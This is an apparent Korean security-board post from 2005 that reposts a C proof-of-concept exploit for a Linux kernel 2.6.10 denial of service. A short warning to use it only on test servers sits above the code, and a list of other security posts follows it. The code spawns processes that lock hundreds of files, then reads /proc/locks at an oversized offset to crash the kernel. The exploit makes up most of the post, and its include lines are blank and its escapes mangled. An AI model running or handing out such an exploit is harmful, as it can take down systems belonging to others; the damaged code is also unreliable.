아이디/패스워드 기억
최근사진
Total : 70,538
Yesterday : 138
Today : 21

Linux Kernel v2.6.10 Remote Denial of Service Proof of Concept Exploit

ino | 2005.03.30 21:22 | 조회 1376
커널 문제가 너무 자주 나오네요~ 큰일입니다.
테스트 서버에만 적용하시길 바랍니다.~
운영되는 서버 죽어버릴수도 있으니까요

Linux Kernel v2.6.10 Remote Denial of Service Proof of Concept Exploit
Date : 30/03/2005

/*
* linux kernel <=2.6.10(2.6.x) DOS exploit
* writen by ChoiX
* (c) uKt Research
* [www.unl0ck.org][info@unl0ck.org]
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define SIZE 0x80004242

_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh);

void createfile(){
int nm1, filev;
char vname[424];

for(nm1=0;nm1<920;nm1++){
snprintf(vname, sizeof(vname), "UNLOCKRESEARCHTEAM%d.%d", getpid(), nm1);
filev = open(vname, O_CREAT|O_RDWR, S_IRWXU);
if(filev < 0){
printf("ERRORn");
perror("open()");
}
if(flock(filev,LOCK_EX) == -1){
printf("ERRORn");
perror("flock()");
}
}
while(42);
}

int main(int argc, char *argv[]){
int count, fd, i, fv;
void *mv;
char *buf1, *buf2;
loff_t lr;
int nm1;

printf("ttkernel-2.6.10 DoS by ChoiX [Unl0ck Team]n");
printf("[--]create files(it can take a few minutes)...");
nm1 = 5;
while(count--){
if(!fork()){
createfile();
}
}
sleep(100);

printf("OKn");

printf("[--]start exploiting...");

system("sync");
fd=open("/proc/locks", O_RDONLY);
if(fd < 0){
printf("ERRORn");
perror("open()");
}
buf1 = malloc(1024*1024*8);
buf2 = malloc(1024*1024*8);

if(_llseek(fd,42,SIZE,&lr,SEEK_SET) == -1){
printf("ERRORn");
printf("llseek()");
}
i=read(fd,buf2, SIZE);
perror("read");
printf("read=%d mv=%x fv=%xn %.300s",i,(int)mv,fv,buf2);
while(42);
return 42;
}

twitter facebook me2day 요즘
110개(1/6페이지)
보안
번호 제목 글쓴이 조회 날짜
110 공유기별 기본 패스워드 및 포트포워딩 위치. 몰라맨 120 2016.07.25 09:58
109 usb 사용흔적제거에 강력한 유틸 몰라맨 96 2014.03.14 21:33
108 Adobe Flash Player/Reader/Acrobat 신규 취약점 몰라맨 142 2011.03.21 10:10
107 제로보드 보안 패치 pl9 첨부파일 ino 371 2009.02.10 18:45
106 [일반] Google's new Web browser (Chrome) allows ino 390 2008.09.05 09:47
105 [일반] 해킹의 표적 -가상 메모리 파일(Pagefile.sys)을 윈도우 종료시 ino 560 2008.02.19 13:25
104 [일반] 시스템 분석 - 추적 비밀글 ino 5 2008.02.05 16:16
103 [일반] Updated sendmail packages fix security i ino 1072 2006.04.18 10:37
102 [일반] 공개 웹 게시판 제로보드 취약점 패치 권고 ino 3455 2006.04.02 18:22
101 [일반] Microsoft Windows WMF/EMF File Handling ino 1175 2005.11.17 11:13
100 [일반] openssl 보안 업데이트 ino 1155 2005.10.17 21:19
99 [일반] Linux Kernel Local Denial of Service and ino 1155 2005.10.11 23:29
98 [일반] Kaspersky Anti-Virus Products Remote Hea ino 987 2005.10.04 15:20
97 [일반] ProZilla "ftpsearch" Option Client-Side ino 1028 2005.10.03 18:40
96 [일반] Updated kernel packages fix security iss ino 2296 2005.06.19 17:43
95 [일반] MySQL MaxDB Webtool Remote Stack Overflo ino 1368 2005.05.11 21:39
94 [일반] IBM AS/400 LDAP Server User Accounts Dis ino 1373 2005.04.06 11:01
93 [일반] PHP 4.x/5.x Denial of Service and Securi ino 1360 2005.04.03 13:23
>> [일반] Linux Kernel v2.6.10 Remote Denial of Se ino 1377 2005.03.30 21:22
91 [일반] overwriting low kernel memory ino 1329 2005.03.23 15:02